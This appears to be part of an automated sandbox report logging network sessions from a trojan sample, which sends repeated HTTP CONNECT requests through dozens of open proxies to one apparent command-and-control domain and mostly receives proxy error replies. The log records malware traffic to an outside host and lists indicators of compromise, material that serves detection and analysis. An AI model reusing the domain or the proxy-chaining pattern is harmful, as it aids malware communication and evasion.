                                                                                1130192.168.2.853476104.18.220.95805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.754041910 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.841244936 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:30 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1131192.168.2.85251251.15.21.216623895828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.754157066 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1132192.168.2.853483104.18.44.93805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.755801916 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.845330000 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:30 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1133192.168.2.85342345.43.71.14767455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.767427921 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.381472111 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.624783039 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                Proxy-Connection: close
                                                                                X-Webshare-Error: 407
                                                                                X-Webshare-Reason: invalidpassword
                                                                                Date: Fri, 23 Feb 2024 13:28:31 GMT
                                                                                Content-Length: 121
                                                                                Content-Type: text/plain; charset=utf-8
                                                                                Connection: close
                                                                                Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1134192.168.2.853377202.131.159.5856785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.767699003 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1135192.168.2.853431199.58.184.9741455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.767972946 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1136192.168.2.853458104.244.75.78315345828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.795726061 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1137192.168.2.85347115.236.106.23631285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.803175926 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.967339039 CET146INHTTP/1.1 200 OK
                                                                                Date: Fri, 23 Feb 2024 13:28:30 GMT
                                                                                Content-Type: text/plain
                                                                                X-Powered-By: PHP/5.4.7
                                                                                Server: squid/4.10
                                                                                Content-Length: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1138192.168.2.85321596.36.50.99395935828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.803518057 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1139192.168.2.85341888.135.41.23641535828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.804083109 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1140192.168.2.85349031.207.38.66805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.804337025 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.973591089 CET408INHTTP/1.1 405 Method Not Allowed
                                                                                Date: Fri, 23 Feb 2024 13:28:30 GMT
                                                                                Server: Apache
                                                                                Allow: GET,POST,OPTIONS,HEAD
                                                                                Content-Length: 224
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 43 4f 4e 4e 45 43 54 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method CONNECT is not allowed for this URL.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1141192.168.2.853448161.97.74.176300005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.805100918 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1142192.168.2.850893146.59.70.29329535828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.821840048 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.991914988 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.991997957 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.992305040 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1143192.168.2.853408154.12.178.107299855828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.852159023 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1144192.168.2.853033117.160.250.132805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.874644995 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.898140907 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.941384077 CET303INHTTP/1.1 400 Bad Request
                                                                                Server: openresty
                                                                                Date: Fri, 23 Feb 2024 13:28:34 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 154
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1145192.168.2.85248347.74.152.2988885828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.874651909 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1146192.168.2.8534458.213.137.15580345828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.878711939 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1147192.168.2.85073449.0.2.24354305828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.887108088 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1148192.168.2.85340460.188.102.225180805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.887161970 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1149192.168.2.850739103.204.82.3432125828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.887608051 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.991904020 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1150192.168.2.853219103.227.192.4781115828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.925405979 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.085736036 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.192274094 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.195507050 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1151192.168.2.853427146.190.85.7931285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.941998005 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.358170986 CET1286INHTTP/1.1 503 Service Unavailable
                                                                                Server: squid/4.6
                                                                                Mime-Version: 1.0
                                                                                Date: Fri, 23 Feb 2024 13:28:31 GMT
                                                                                Content-Type: text/html;charset=utf-8
                                                                                Content-Length: 3702
                                                                                X-Squid-Error: ERR_DNS_FAIL 0
                                                                                Vary: Accept-Language
                                                                                Content-Language: en
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 39 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2019 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1152192.168.2.852555186.203.163.5356785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.973567963 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1153192.168.2.85263792.205.110.118313965828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:30.994949102 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1154192.168.2.85350047.91.104.8831285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.090214014 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:51.374804974 CET214INHTTP/1.1 503 Service Unavailable
                                                                                content-length: 107
                                                                                cache-control: no-cache
                                                                                content-type: text/html
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1155192.168.2.849981212.252.66.20980805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.098856926 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.649127007 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1156192.168.2.85325892.205.110.118274255828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.117151022 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.194999933 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.382554054 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.398540974 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1157192.168.2.853519163.172.149.133163795828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.117247105 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
